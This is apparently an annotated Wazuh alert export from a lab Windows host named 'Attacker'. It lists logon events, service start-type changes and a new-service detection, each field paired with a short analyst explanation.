Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533904.241675 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:22.6696087Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2951 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10448 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533904.243487 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.8016634Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2952 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10448 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Windows Modules Installer service was changed from auto start to demand start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Windows Modules Installer No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: TrustedInstaller No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533904.245267 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:38.6466082Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43521 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533904.252603 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:39.5684739Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43523 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533904.259939 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:40.9799561Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43525 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 14292 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: New Windows Service Created Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61138 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1543.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Persistence', 'Privilege Escalation'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Service'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533908.267277 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7045 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:31:16.4230414Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2969 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 3052 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "A service was installed in the system.
Service Name: Bluetooth Device (Personal Area Network)
Service File Name: \SystemRoot\System32\drivers\bthpan.sys
Service Type: kernel mode driver
Service Start Type: demand start
Service Account: " No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.serviceName: Bluetooth Device (Personal Area Network) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
